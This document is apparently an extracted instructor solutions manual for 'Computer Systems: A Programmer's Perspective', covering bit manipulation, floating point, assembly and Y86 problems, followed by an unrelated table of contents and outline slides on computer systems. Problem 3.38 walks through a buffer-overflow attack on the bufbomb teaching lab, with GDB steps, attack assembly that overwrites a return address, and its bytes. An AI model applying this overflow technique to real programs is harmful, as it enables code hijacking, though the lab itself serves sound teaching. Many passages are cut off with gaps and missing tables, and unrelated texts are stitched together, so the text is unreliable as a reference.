This problem highlights the difference between zero extension and sign extension. It also provides an excuse to show an interesting trick that compilers often use: shifting to perform masking and sign extension.

A. The function does not perform any sign extension. For example, if we attempt to extract byte 0 from word 0xFF, we will get 255, rather than -1.
B. The following code uses a well-known trick for using shifts to isolate a particular range of bits and to perform sign extension at the same time. First, we perform a left shift so that the most significant bit of the desired byte is at bit position 31. Then we right shift by 24, moving the byte into the proper position and performing sign extension at the same time.

    [...]
        int left = word << ((3-bytenum) << 3);
        return left >> 24;
    }

Problem 2.48 Solution:
This problem lets students rework the proof that complement plus increment performs negation. We make use of the property that two's complement addition is associative, commutative, and has additive inverses. Using C notation, if we define y to be x-1, then we have ~y+1 equal to -y, and hence ~y equals -y-1. Substituting gives the expression -(x-1)-1, which equals -x.

Problem 2.49 Solution:
This problem requires a fairly deep understanding of two's complement arithmetic. Some machines only provide one form of multiplication, and hence the trick shown in the code here is actually required to perform that actual form. As seen in Equation 2.16 we have [...]. The final term has no effect on the [...]-bit representation of [...], but the middle term represents a [...]

code/data/uhp-ans.c

Problem 2.50 Solution:
A. Factor 5: x + (x<<2)
B. Factor 9: x + (x<<3)
C. Factor 14: (x<<4) - (x<<1)
D. Factor -56: (x<<3) - (x<<6)

Problem 2.51 Solution:
Bit patterns similar to these arise in many applications. Many programmers provide them directly in hexadecimal, but it would be better if they could express them in more abstract ways.
A. ((1 << [...]
B. ((1 << [...]

Problem 2.52 Solution:
Byte extraction and insertion code is useful in many contexts. Being able to write this sort of code is an important skill to foster.

code/data/rbyte-ans.c

Problem 2.53 Solution:
These problems are fairly tricky. They require generating masks based on the shift amounts. Shift value k equal to 0 must be handled as a special case, since otherwise we would be generating the mask by performing a left shift by 32.

    unsigned srl(unsigned x, int k)
    {
        /* Perform shift arithmetically */
        unsigned xsra = (int) x >> k;
        /* Make mask of low order 32-k bits */
        unsigned mask = k ? ((1 << (32-k)) - 1) : ~0;

        return xsra & mask;
    }

code/data/rshift-ans.c

    int sra(int x, int k)
    {
        /* Perform shift logically */
        int xsrl = (unsigned) x >> k;
        /* Make mask of high order k bits */
        unsigned mask = k ? ~((1 << (32-k)) - 1) : 0;

        return (x < 0) ? mask | xsrl : xsrl;
    }

B. (a) For [...], we have [...]

code/data/floatge-ans.c

    int float_ge(float x, float y)
    {
        unsigned ux = f2u(x);
        unsigned uy = f2u(y);
        unsigned sx = ux >> 31;
        unsigned sy = uy >> 31;

        return
            (ux<<1 == 0 && uy<<1 == 0) ||  /* Both are zero */
            (!sx && sy) ||                 /* x >= 0, y < 0 */
            (!sx && !sy && ux >= uy) ||    /* x >= 0, y >= 0 */
            (sx && sy && ux <= uy);        /* x < 0, y < 0 */
    }

This exercise is of practical value, since Intel-compatible processors perform all of their arithmetic in extended precision. It is interesting to see how adding a few more bits to the exponent greatly increases the range of values that can be represented.

[Table: extended-precision values for the smallest denormalized and largest normalized numbers; the numeric entries did not survive extraction]

Problem 2.59 Solution:
We have found that working through floating point representations for small word sizes is very instructive. Problems such as this one help make the description of IEEE floating point more concrete.

[Table: rows include "Smallest value" and "Largest denormalized"; the only recovered entries are 8000 and 4700]

    /* Compute 2**x */
    float fpwr2(int x) {
        unsigned exp, sig;
        unsigned u;

        if (x < -149) {
            /* Too small.  Return 0.0 */
            exp = 0;
            sig = 0;
        } else if (x < -126) {
            /* Denormalized result */
            exp = 0;
            sig = 1 << (x + 149);
        } else if (x < 128) {
            /* Normalized result. */
            exp = x + 127;
            sig = 0;
        } else {
            /* Too big.  Return +oo */
            exp = 255;
            sig = 0;
        }
        u = exp << 23 | sig;
        return u2f(u);
    }

1.3 Chapter 3: Machine Level Representation of C Programs

    int decode2(int x, int y, int z)
    {
        int t1 = y - z;
        int t2 = x * t1;
        int t3 = (t1 << 31) >> 31;
        int t4 = t3 ^ t2;
        return t4;
    }

Problem 3.32 Solution:
This code example demonstrates one of the pedagogical challenges of using a compiler to generate assembly code examples. Seemingly insignificant changes in the C code can yield very different results. Of course, students will have to contend with this property as they work with machine-generated assembly code anyhow. They will need to be able to decipher many different code patterns. This problem encourages them to think in abstract terms about one such pattern.

    movl 8(%ebp),%edx       x
    movl 12(%ebp),%ecx      y
    movl %edx,%eax
    subl %ecx,%eax          result = x - y
    cmpl %ecx,%edx          Compare x:y
    jge .L3                 if >= goto done:
    movl %ecx,%eax
    subl %edx,%eax          result = y - x
  .L3:                      done:

A. When x < y, it will compute x - y first and then y - x. When x >= y it just computes x - y.
B. The code for then-statement gets executed unconditionally. It then jumps over the code for else-statement if the test is false.
C.
        then-statement
        t = test-expr;
        if (t)
            goto done;
        else-statement
    done:
D. The code in then-statement must not have any side effects, other than to set variables that are also set [...]

Problem 3.33 Solution:
This problem requires students to reason about the code fragments that implement the different branches of a switch statement. For this code, it also requires understanding different forms of pointer dereferencing.

A. In line 29, register %edx is copied to register %eax as the return value. From this, we can infer that %edx holds result.
B. The original C code for the function is as follows:

    /* Enumerated type creates set of constants numbered 0 and upward */
    typedef enum { MODE_A, MODE_B, MODE_C, MODE_D, MODE_E } mode_t;

    int switch3(int *p1, int *p2, mode_t action)
    {
        int result = 0;
        switch (action) {
        case MODE_A:
            [...]
        case MODE_B:
            *p2 += *p1;
            result = *p2;
            break;
        case MODE_C:
            *p2 = 15;
            result = *p1;
            break;
        case MODE_D:
            *p2 = *p1;
            /* Fall Through */
        case MODE_E:
            result = 17;
            break;
        default:
            result = -1;
        }
        return result;
    }

Problem 3.34 Solution:
This problem gives students practice analyzing disassembled code. The switch statement contains all the features one can imagine: cases with multiple labels, holes in the range of possible case values, and cases that fall through.

    int switch_prob(int x)
    {
        int result = x;

        switch (x) {
        case 50:
        case 52:
            result <<= 2;
            break;
        case 53:
            result >>= 2;
            [...]
            /* Fall through */
        case 55:
            result *= result;
            /* Fall through */
        default:
            result += 10;
        }

        return result;
    }

code/asm/varprod-ans.c

    int var_prod_ele_opt(var_matrix A, var_matrix B, int i, int k, int n)
    {
        int *Aptr = &A[i*n];
        int *Bptr = &B[k];
        int result = 0;
        int cnt = n;

        if (n <= 0)
            return result;

        do {
            result += (*Aptr) * (*Bptr);
            Aptr += 1;
            Bptr += n;
            cnt--;
        } while (cnt);

        return result;
    }

code/asm/structprob-ans.c

    typedef struct {
        int idx;
        int x[4];
    } a_struct;

    /* Read input line and write it back */
    /* Code will work for any buffer size.  Bigger is more time-efficient */
    #define BUFSIZE 64
    void good_echo()
    {
        char buf[BUFSIZE];
        int i;
        while (1) {
            if (!fgets(buf, BUFSIZE, stdin))
                return;  /* End of file or error */
            /* Print characters in buffer */
            for (i = 0; buf[i] && buf[i] != '\n'; i++)
                if (putchar(buf[i]) == EOF)
                    return;  /* Error */
            if (buf[i] == '\n') {
                /* Reached terminating newline */
                putchar('\n');
                return;
            }
        }
    }

An alternative implementation is to use getchar to read the characters one at a time.

Problem 3.38 Solution:
Successfully mounting a buffer overflow attack requires understanding many aspects of machine-level programs. It is quite intriguing that by supplying a string to one function, we can alter the behavior of another function that should always return a fixed value. In assigning this problem, you should also give students a stern lecture about ethical computing practices and dispel any notion that hacking into systems is a desirable or even acceptable thing to do.

Our solution starts by disassembling bufbomb, giving the following code for getbuf:

     1  080484f4 <getbuf>:
     2   80484f4:  55                push   %ebp
     3   80484f5:  89 e5             mov    %esp,%ebp
     4   80484f7:  83 ec 18          sub    $0x18,%esp
     5   80484fa:  83 c4 f4          add    $0xfffffff4,%esp
     6   80484fd:  8d 45 f4          lea    0xfffffff4(%ebp),%eax
     7   8048500:  50                push   %eax
     8   8048501:  e8 6a ff ff ff    call   8048470
     9   8048506:  b8 01 00 00 00    mov    $0x1,%eax
    10   804850b:  89 ec             mov    %ebp,%esp
    11   804850d:  5d                pop    %ebp
    12   804850e:  c3                ret

We can see on line 6 that the address of buf is 12 bytes below the saved value of %ebp, which is 4 bytes [...] of %ebp, and the address of the start of the buffer. To determine the relevant values, we run GDB as follows:

1. First, we set a breakpoint in getbuf and run the program to that point:
    (gdb) break getbuf
    (gdb) run
Comparing the stopping point to the disassembly, we see that it has already set up the stack frame.
2. We get the value of buf by computing a value relative to %ebp:
    (gdb) print /x (%ebp + 12)
This gives 0xbfffefbc.
3. We find the saved value of register %ebp by dereferencing the current value of this register:
    (gdb) print /x *$ebp
This gives 0xbfffefe8.
4. We find the value of the return pointer on the stack, at offset 4 relative to %ebp:
    (gdb) print /x *((int *) $ebp + 1)
This gives 0x8048528.

We can now put this information together to generate assembly code for our attack:

    pushl $0x8048528        Put correct return pointer back on stack
    movl $0xdeadbeef,%eax   Alter return value
    ret                     Re-execute return
    .align 4                Round up to 12
    .long 0xbfffefe8        Saved value of %ebp
    .long 0xbfffefbc        Location of buf
    .long 0x00000000        Padding

Note that we have used the .align statement to get the assembler to insert enough extra bytes to use up twelve bytes for the code. We added an extra 4 bytes of 0s at the end, because in some cases OBJDUMP would not generate the complete byte pattern for the data. These extra bytes (plus the terminating null byte) will overflow into the stack frame for test, but they will not affect the program behavior.

Assembling this code and disassembling the object code gives us the following:

     0:  68 28 85 04 08    push  $0x8048528
     5:  b8 ef be ad de    mov   $0xdeadbeef,%eax
     a:  c3                ret
     b:  90                nop                Byte inserted for alignment.
     c:  e8 ef ff bf bc    call  0xbcc00000   Invalid disassembly.
    11:  ef                out   %eax,(%dx)   Trying to disassemble
    12:  ff                (bad)              data

From this we can read off the byte sequence:

Problem 3.39 Solution:
This problem is a variant on the asm examples in the text. The code is actually fairly simple. It relies on the fact that asm outputs can be arbitrary lvalues, and hence we can use dest[0] and dest[1] directly in the output list.

code/asm/asmprobs-ans.c

Problem 3.40 Solution:
For this example, students essentially have to write the entire function in assembly. There is no (apparent) way to interface between the floating point registers and the C code using extended asm.

code/asm/fscale.c

1.4 Chapter 4: Processor Architecture

Problem 4.32 Solution:
This problem makes students carefully examine the tables showing the computation stages for the different instructions. The steps for iaddl are a hybrid of those for irmovl and OPl.

[Tables: computation steps by stage (Fetch, Decode, Execute, Memory, Write back, PC update) for iaddl and for leave; the individual entries did not survive extraction]

Problem 4.34 Solution:
The following HCL code includes implementations of both the iaddl instruction and the leave instructions. The implementations are fairly straightforward given the computation steps listed in the solutions to problems 4.32 and 4.33. You can test the solutions using the test code in the ptest subdirectory. Make sure you use command line argument '-i'.
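Returning to the Chapter 2 material above, the mask-based shifts of Problem 2.53 can be written as a self-checking sketch. This is not the manual's code: the names srl32 and sra32 are hypothetical, fixed-width types replace int and unsigned, and the masks are built from an unsigned 1 so that a shift into bit 31 stays well defined. It assumes, as the original does, that >> on a negative signed value is an arithmetic shift, which C leaves implementation-defined.

```c
#include <assert.h>
#include <stdint.h>

/* Logical right shift built from an arithmetic one (0 <= k < 32).
   Assumes >> on a negative int32_t shifts in copies of the sign bit. */
uint32_t srl32(uint32_t x, int k)
{
    assert(k >= 0 && k < 32);
    uint32_t xsra = (uint32_t)((int32_t)x >> k);
    /* Mask of the low-order 32-k bits; k == 0 would need a shift by 32 */
    uint32_t mask = k ? ((UINT32_C(1) << (32 - k)) - 1) : ~UINT32_C(0);
    return xsra & mask;
}

/* Arithmetic right shift built from a logical one (0 <= k < 32). */
int32_t sra32(int32_t x, int k)
{
    assert(k >= 0 && k < 32);
    uint32_t xsrl = (uint32_t)x >> k;
    /* Mask of the high-order k bits, empty when k == 0 */
    uint32_t mask = k ? ~((UINT32_C(1) << (32 - k)) - 1) : 0;
    return (int32_t)((x < 0) ? (mask | xsrl) : xsrl);
}
```

The k == 0 special case is the point the solution text makes: without it the mask would be produced by a left shift by 32, whose effect C does not define.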

Write Great Code, Volume 1: Understanding the Machine (2nd Edition)

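4.1 Introduction to floating-point arithmetic
4.2 IEEE floating-point formats
4.2.1 Single-precision floating-point format 4.2.2 Double-precision floating-point format 4.2.3 Extended-precision floating-point format 4.2.4 Quad-precision floating-point format
4.3 Normalized and denormalized forms
4.4 Rounding
4.5 Special floating-point values
4.6 Floating-point exceptions
4.7 Floating-point operations
4.7.1 Floating-point representation 4.7.2 Floating-point addition and subtraction 4.7.3 Floating-point multiplication and division
4.8 For more information
12.3.1 Memory-mapped input/output 12.3.2 I/O-mapped input/output 12.3.3 Direct memory access
12.5 System buses and data transfer rates
12.5.1 Performance of the PCI bus 12.5.2 Performance of the ISA bus 12.5.3 The AGP bus
12.7 Handshaking
12.8 I/O port timeouts
12.9 Interrupts and polled I/O
12.10 Protected-mode operation and device drivers
12.11 For more information
3.1 Arithmetic operations on binary and hexadecimal numbers
3.1.1 Binary addition 3.1.2 Binary subtraction 3.1.3 Binary multiplication 3.1.4 Binary division
3.2 Logical operations on bits
3.3 Logical operations on binary values and bit strings
3.4.1 Testing a bit in a bit string using AND 3.4.2 Testing multiple bits for zero or nonzero using AND 3.4.3 Comparing multiple bits in a binary string 3.4.4 Creating modulo-n counters using AND
3.6 Bit fields and packed data
3.7 Packing and unpacking data
3.8 For more information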

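Computer Systems: A Programmer's Perspective, chapter

Scientific computing
Used to solve complex mathematical problems and run simulations, such as weather forecasting and nuclear-explosion simulation.
Artificial intelligence
Used to simulate intelligent human behavior, such as speech recognition and image recognition.
Network communication
Used for data transfer and communication between computers, such as the Internet and the Internet of Things.
02 Computer Hardware Systems
Central processing unit
Arithmetic unit
Performs arithmetic and logical operations and processes data.
Control unit
Coordinates the components of the computer so that it carries out the steps laid down by the program.
Complex instruction set (CISC) and reduced instruction set (RISC)
CISC offers a rich and powerful instruction set at the cost of high complexity; RISC uses a small set of simple instructions, with a clean design approach and high efficiency.
Program execution
Loading the program
The program is loaded from external storage into memory in preparation for execution.
Instruction fetch and execution
The instruction is fetched from memory at the address held in the program counter (PC), then decoded and executed.
Data access and computation
Data is accessed and operated on as the instruction specifies, and the result is written back to a register or to memory.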
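The fetch, decode, and execute steps described above can be sketched as a loop over a toy instruction memory. Everything in this example is hypothetical and invented for illustration: the three opcodes, the Instr layout, and the four-register file do not correspond to any real instruction set.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical three-instruction machine, for illustration only. */
enum { OP_HALT = 0, OP_LOADI = 1, OP_ADD = 2 };

typedef struct {
    uint8_t op;    /* operation code */
    uint8_t dst;   /* destination register index (0..3) */
    int32_t arg;   /* immediate for LOADI, source register index for ADD */
} Instr;

/* Run a program until HALT or the end of memory; returns register 0. */
int32_t run(const Instr *mem, size_t n)
{
    int32_t reg[4] = {0};
    size_t pc = 0;                       /* program counter */
    while (pc < n) {
        Instr ir = mem[pc++];            /* fetch, then advance the PC */
        assert(ir.dst < 4);
        switch (ir.op) {                 /* decode */
        case OP_LOADI:                   /* execute: load an immediate */
            reg[ir.dst] = ir.arg;
            break;
        case OP_ADD:                     /* execute: reg[dst] += reg[arg] */
            assert(ir.arg >= 0 && ir.arg < 4);
            reg[ir.dst] += reg[ir.arg];
            break;
        default:                         /* OP_HALT or unknown opcode */
            return reg[0];
        }
    }
    return reg[0];
}
```

A program that loads 40 into register 0, loads 2 into register 1, adds register 1 to register 0, and halts leaves 42 in register 0.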
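Computer Systems: A Programmer's Perspective, chapter
Contents
• Overview of computer systems • Computer hardware systems • Computer software systems • How a computer system works • Performance evaluation of computer systems • Security and reliability of computer systems
01 Overview of Computer Systems
Components of a computer system
Hardware
Includes the central processing unit (CPU), memory, input/output devices, and so on; provides computing power and data storage.
Software
Output devices
Convert the results of processing into a form people can read or perceive, such as monitors, printers, and speakers.
Input/output interfaces
The bridge between input/output devices and the host computer, handling data transfer and control.
03 Computer Software Systems
System software
Operating system
Provides the interface between the computer hardware and application programs, and controls and manages the computer's hardware and software resources.
Database management system
Software for storing, retrieving, defining, and managing large amounts of data, providing means of organizing and accessing data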